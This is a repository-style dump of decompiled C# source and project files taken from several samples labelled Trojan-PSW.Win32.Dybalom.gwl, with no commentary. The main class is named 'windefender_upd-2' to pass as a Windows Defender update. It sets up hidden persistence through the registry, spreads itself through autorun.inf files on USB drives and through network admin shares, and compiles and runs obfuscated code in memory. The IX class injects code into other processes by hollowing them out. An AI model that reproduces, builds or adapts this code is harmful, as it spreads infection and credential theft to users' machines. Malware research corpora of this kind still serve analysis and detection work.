<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{30C9438B-F02F-487B-9233-C4D46FE57FAC}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>windefender_upd-2</AssemblyName>
<ApplicationVersion>1.3.2.4</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Ghost.cs" />
<Compile Include="FHQnUxOuBUcRwss.cs" />
<Compile Include="YUGFYLIGvlfiyl.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="H.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "windefender_upd-2", "Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.csproj", "{30C9438B-F02F-487B-9233-C4D46FE57FAC}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Debug|Any CPU.Build.0 = Debug|Any CPU
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Release|Any CPU.ActiveCfg = Release|Any CPU
{30C9438B-F02F-487B-9233-C4D46FE57FAC}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560/YUGFYLIGvlfiyl.cs
+550
View File
@@ -0,0 +1,550 @@
// Decompiled with JetBrains decompiler
// Type: YUGFYLIGvlfiyl
// Assembly: windefender_upd-2, Version=1.3.2.4, Culture=neutral, PublicKeyToken=null
// MVID: 586226ED-1F78-4585-B234-14A26CF968DE
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-55ca18d19b2d75973541e883e8010d88e1f774533692f9ffc976ac7a227ca560.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using My;
using System;
using System.CodeDom.Compiler;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Reflection;
using System.Resources;
using System.Threading;
using System.Windows.Forms;
public class YUGFYLIGvlfiyl
{
private static string urPkJBxJaoKxHfa;
private static string DFlGLTJoxxwCYfm;
private static string RedtwzrQfYIqsNp;
private static string uIFnBaaCKWySxWn;
[DebuggerNonUserCode]
public YUGFYLIGvlfiyl()
{
}
public static string HqBHDPguDENkfJL(string JEhjQWpxnTOONSD, string KRhIIXNQIgKomUJ)
{
char[] charArray1 = JEhjQWpxnTOONSD.ToCharArray();
char[] charArray2 = KRhIIXNQIgKomUJ.ToCharArray();
char[] chArray = new char[JEhjQWpxnTOONSD.Length - 2 + 1];
int num1 = (int) charArray1[JEhjQWpxnTOONSD.Length - 1];
charArray1[JEhjQWpxnTOONSD.Length - 1] = char.MinValue;
int index1 = 0;
int num2 = JEhjQWpxnTOONSD.Length - 1;
for (int index2 = 0; index2 <= num2; ++index2)
{
if (index2 < JEhjQWpxnTOONSD.Length - 1)
{
if (index1 >= charArray2.Length)
index1 = 0;
int num3 = (int) charArray1[index2];
int num4 = (int) charArray2[index1];
int num5 = num3 - num1 - num4;
chArray[index2] = Convert.ToChar(num5);
++index1;
}
}
return new string(chArray);
}
public static void CiMbIOhpfLGHFKu()
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + Path.GetFileName(Application.ExecutablePath);
while (true)
{
try
{
if (!System.IO.File.Exists(str))
{
System.IO.File.Copy(Application.ExecutablePath, str);
YUGFYLIGvlfiyl.gjbzPIrZcwZdrCX(Path.GetFileName(Application.ExecutablePath), str);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
Thread.Sleep(5000);
}
}
public static void gjbzPIrZcwZdrCX(string Name, string Path) => Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW"), true).SetValue(Name, (object) Path, RegistryValueKind.String);
public static object Spread(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_2:
int num3 = 2;
string location = Assembly.GetExecutingAssembly().Location;
label_3:
num3 = 3;
System.IO.File.Copy(location, drive + "\\erPCyQY.exe");
label_4:
num3 = 4;
FileInfo fileInfo = new FileInfo(drive + "\\erPCyQY.exe");
label_5:
num3 = 5;
fileInfo.Attributes = FileAttributes.Hidden;
label_6:
obj1 = (object) null;
goto label_13;
label_8:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_13;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_8;
}
throw ProjectData.CreateProjectError(-2146828237);
label_13:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
public static object SetAutorun(string drive)
{
label_1:
int num1;
object obj1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = -2;
label_2:
int num3 = 2;
StreamWriter streamWriter = new StreamWriter(drive + "\\autorun.inf");
label_3:
num3 = 3;
streamWriter.WriteLine("[AutoRun]");
label_4:
num3 = 4;
streamWriter.WriteLine("Open = erPCyQY.exe");
label_5:
num3 = 5;
streamWriter.Close();
label_6:
num3 = 6;
FileInfo fileInfo = new FileInfo(drive + "\\autorun.inf");
label_7:
num3 = 7;
fileInfo.Attributes = FileAttributes.Hidden;
label_8:
obj1 = (object) null;
goto label_15;
label_10:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_6;
case 7:
goto label_7;
case 8:
goto label_8;
case 9:
goto label_15;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_10;
}
throw ProjectData.CreateProjectError(-2146828237);
label_15:
object obj2 = obj1;
if (num2 == 0)
return obj2;
ProjectData.ClearProjectError();
return obj2;
}
public static void searchDrives()
{
label_1:
int num1;
int num2;
try
{
label_2:
ProjectData.ClearProjectError();
num1 = -2;
label_3:
int num3 = 3;
Thread.Sleep(1000);
label_4:
num3 = 4;
DriveInfo[] drives = DriveInfo.GetDrives();
label_5:
num3 = 5;
DriveInfo[] driveInfoArray = drives;
int index = 0;
goto label_16;
label_7:
num3 = 6;
DriveInfo driveInfo;
if (driveInfo.DriveType != DriveType.Removable)
goto label_14;
label_8:
num3 = 7;
if (!driveInfo.IsReady)
goto label_13;
label_9:
num3 = 8;
if (System.IO.File.Exists(driveInfo.Name + "\\erPCyQY.exe"))
goto label_12;
label_10:
num3 = 9;
YUGFYLIGvlfiyl.Spread(driveInfo.Name);
label_11:
num3 = 10;
YUGFYLIGvlfiyl.SetAutorun(driveInfo.Name);
label_12:
label_13:
label_14:
++index;
label_15:
num3 = 14;
label_16:
if (index < driveInfoArray.Length)
{
driveInfo = driveInfoArray[index];
goto label_7;
}
else
goto label_2;
label_18:
num2 = num3;
switch (num1 > -2 ? num1 : 1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_1;
case 2:
case 15:
goto label_2;
case 3:
goto label_3;
case 4:
goto label_4;
case 5:
goto label_5;
case 6:
goto label_7;
case 7:
goto label_8;
case 8:
goto label_9;
case 9:
goto label_10;
case 10:
goto label_11;
case 11:
goto label_12;
case 12:
goto label_13;
case 13:
goto label_14;
case 14:
goto label_15;
case 16:
goto label_23;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_18;
}
throw ProjectData.CreateProjectError(-2146828237);
label_23:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
[STAThread]
public static void Main()
{
ResourceManager resourceManager = new ResourceManager("H", Assembly.GetExecutingAssembly());
string Expression = Conversions.ToString(resourceManager.GetObject("K4T8F6c"));
FHQnUxOuBUcRwss fhQnUxOuBucRwss = new FHQnUxOuBUcRwss(Conversions.ToString(resourceManager.GetObject("N1HXjA")));
string[] strArray = Strings.Split(Expression, "SuZz5vnl5M1s6Sra");
string Right = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("śƕšŽ´", "So8dxq7eL5m3PMUH");
string str1 = Conversions.ToString(Operators.ConcatenateObject((object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\"), Operators.AddObject(resourceManager.GetObject("WggM2"), (object) ".exe")));
try
{
Process process = (Process) null;
Process[] processes = Process.GetProcesses();
int index = 0;
if (index < processes.Length)
goto label_6;
else
goto label_7;
label_3:
if (System.IO.File.Exists(str1))
{
System.IO.File.Delete(str1);
goto label_9;
}
else
goto label_9;
label_6:
process = processes[index];
if (!str1.Contains(process.ProcessName))
goto label_3;
label_7:
process.Kill();
goto label_3;
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_9:
try
{
MyProject.Computer.FileSystem.WriteAllBytes(str1, fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("UntJ0")))), false);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
YUGFYLIGvlfiyl.kXKlIGiQhTXwXic("MonAMour", "R", YUGFYLIGvlfiyl.CC(Conversions.ToString(resourceManager.GetObject("nerdz"))), new object[2]
{
(object) fhQnUxOuBucRwss.DbqjTCEYBFTdyMy(Convert.FromBase64String(Conversions.ToString(resourceManager.GetObject("tZAsD")))),
(object) str1
});
new Thread(new ThreadStart(YUGFYLIGvlfiyl.CiMbIOhpfLGHFKu)).Start();
try
{
object environmentVariable = (object) Environment.GetEnvironmentVariable("temp");
Registry.CurrentUser.OpenSubKey(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŚŧŴŮƗƆƌƀŗŧƑŝƙśƝźŭŬŪőƉƓžƊŲƍƄĽƜŞƜŰŵŬŤşƒƘƃƊũŶźůƕ´", "SDZFlqfgGftFs8vW")).SetValue("Win32", Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe"));
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject(environmentVariable, (object) "\\erPCyQY.exe")));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
System.IO.File.Copy(Application.ExecutablePath, Conversions.ToString(Operators.ConcatenateObject((object) Environment.GetFolderPath(Environment.SpecialFolder.Startup), (object) "\\erPCyQY.exe")));
ProjectData.ClearProjectError();
}
YUGFYLIGvlfiyl.searchDrives();
string str2 = MyProject.Computer.FileSystem.SpecialDirectories.CurrentUserApplicationData + YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ţƙŲŮūƐſƌŖĶƒŴţ´", "SnULKmdi4TyHJsgC");
try
{
Dns.GetHostAddresses(Dns.GetHostName())[0].ToString();
Dns.GetHostEntry(YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
System.IO.File.Copy(Application.ExecutablePath, YUGFYLIGvlfiyl.HqBHDPguDENkfJL("žŜŝŹŞŴƋƐŭ´", "S97ZCNhgI8QfVduK"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
object Instance = (object) new StreamWriter("C:\\LcvHEwb.bat");
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŇŪŇŶƒĥŚƊƐĝłħƄƙŒžŲĥœŴƉ´", "SQ0ZoQ7pvIhSns9i")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) "net view >log.txt"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ŭƑųōīşĘłĬšļƇƄŁŏƕŶƉįơŴŭġĽūŜļņĶ´", "SnMyHEDiS9hjbmsu")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\IPC$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\ADMIN$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\D$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\PRINT$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\e$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\d$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" %%t\\C$\\shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ("copy \"" + str2 + "\" shared\\debug.exe")
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "WriteLine", new object[1]
{
(object) ")"
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
NewLateBinding.LateCall(Instance, (System.Type) null, "Close", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null, true);
new Process()
{
StartInfo = {
WindowStyle = ProcessWindowStyle.Hidden,
FileName = "C:\\LcvHEwb.bat"
}
}.Start();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (Operators.CompareString(strArray[2], Right, false) != 0)
;
if (Operators.CompareString(strArray[4], Right, false) != 0)
;
}
private static bool kXKlIGiQhTXwXic(
string Class,
string Void,
Assembly file,
object[] Parameters)
{
bool boolean;
try
{
System.Type type = file.GetType(Class);
if ((object) type != null)
{
MethodInfo method = type.GetMethod(Void);
if ((object) method != null)
{
boolean = Conversions.ToBoolean(method.Invoke((object) null, Parameters));
goto label_6;
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
label_6:
return boolean;
}
public static Assembly CC(string Source)
{
YUGFYLIGvlfiyl.urPkJBxJaoKxHfa = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("űƖŵƦƶǀÛ", "Sh2jiulGpHtnnVzW");
YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƾǃƂƩƱŏƬơƺÛ", "Sju3iiFmZsEiQdJe");
YUGFYLIGvlfiyl.RedtwzrQfYIqsNp = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ƁƜƜƜƔǁĺƀųƞƣƆŵƮƍƍƢőƍƔƛÛ", "SHNMTy1X7UgD5fMD");
YUGFYLIGvlfiyl.uIFnBaaCKWySxWn = YUGFYLIGvlfiyl.HqBHDPguDENkfJL("ĐńŔŒņĬŲũŐğųĞĬ\u008E", "SFZcD8uiUWmXhX8w");
CompilerParameters options = new CompilerParameters();
CodeDomProvider provider = CodeDomProvider.CreateProvider(YUGFYLIGvlfiyl.urPkJBxJaoKxHfa);
options.GenerateExecutable = false;
options.GenerateInMemory = true;
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.DFlGLTJoxxwCYfm);
options.ReferencedAssemblies.Add(YUGFYLIGvlfiyl.RedtwzrQfYIqsNp);
options.CompilerOptions = YUGFYLIGvlfiyl.uIFnBaaCKWySxWn;
options.TreatWarningsAsErrors = false;
return provider.CompileAssemblyFromSource(options, Source).CompiledAssembly;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: sxqoj64a, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 85FE03F2-BE0C-43D8-AE8D-69F7178EA945
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
[DllImport("kernel32")]
private static extern bool SetThreadContext(IntPtr t, uint[] c);
[DllImport("ntdll")]
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool ReadProcessMemory(
IntPtr hProc,
IntPtr baseAddr,
ref IntPtr bufr,
int bufrSize,
ref IntPtr numRead);
[DllImport("kernel32.dll")]
private static extern uint ResumeThread(IntPtr hThread);
[DllImport("kernel32")]
private static extern IntPtr VirtualAllocEx(
IntPtr hProc,
IntPtr addr,
IntPtr size,
int allocType,
int prot);
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
private static extern bool VirtualProtectEx(
IntPtr hProcess,
IntPtr lpAddress,
IntPtr dwSize,
uint flNewProtect,
ref uint lpflOldProtect);
[DllImport("kernel32.dll", SetLastError = true)]
private static extern bool WriteProcessMemory(
IntPtr hProcess,
IntPtr lpBaseAddress,
byte[] lpBuffer,
uint nSize,
out int lpNumberOfBytesWritten);
public static bool R(byte[] bytes, string surrogateProcess)
{
try
{
IntPtr zero1 = IntPtr.Zero;
IntPtr[] pInfo = new IntPtr[4];
byte[] sInfo = new byte[68];
int int32 = BitConverter.ToInt32(bytes, 60);
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
{
uint[] numArray1 = new uint[179];
numArray1[0] = 65538U;
if (IX.GetThreadContext(pInfo[1], numArray1))
{
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
IntPtr zero2 = IntPtr.Zero;
IntPtr bufrSize = new IntPtr(4);
IntPtr zero3 = IntPtr.Zero;
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
{
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
int lpNumberOfBytesWritten;
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
int num3 = int16 - 1;
for (int index = 0; index <= num3; ++index)
{
int[] dst = new int[10];
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
byte[] numArray2 = new byte[dst[4] - 1 + 1];
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
num1 = new IntPtr(numArray2.Length);
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
}
num2 = new IntPtr((long) numArray1[41] + 8L);
num1 = new IntPtr(4);
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
IX.SetThreadContext(pInfo[1], numArray1);
}
}
int num = (int) IX.ResumeThread(pInfo[1]);
}
}
catch
{
return false;
}
return true;
}
}
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3/Trojan-PSW.Win32.Dybalom.gwl.csproj
+36
View File
@@ -0,0 +1,36 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>sxqoj64a</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="IX.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3/Trojan-PSW.Win32.Dybalom.gwl.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "sxqoj64a", "Trojan-PSW.Win32.Dybalom.gwl-7165c430e65007ba4e06c1102bd27284e72058e532c0cd42c4816a0da52139f3.csproj", "{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9014BB17-A2A2-4D48-B5F2-9010CADAB73E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan-PSW/Win32/D/Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606/IX.cs
+127
View File
@@ -0,0 +1,127 @@
// Decompiled with JetBrains decompiler
// Type: IX
// Assembly: lmyuayzw, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C7DC3372-01FA-4B26-9802-388A7CD3ED9E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-PSW.Win32.Dybalom.gwl-99c82de7142b8ce914328b78596a24c420eefa8ab19291d81db74a0b70ddd606.exe
using System;
using System.Runtime.InteropServices;
using System.Text;
public class IX
{
[DllImport("kernel32")]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool CreateProcess(
string appName,
StringBuilder commandLine,
IntPtr procAttr,
IntPtr thrAttr,
[MarshalAs(UnmanagedType.Bool)] bool inherit,
int creation,
IntPtr env,
string curDir,
byte[] sInfo,
IntPtr[] pInfo);
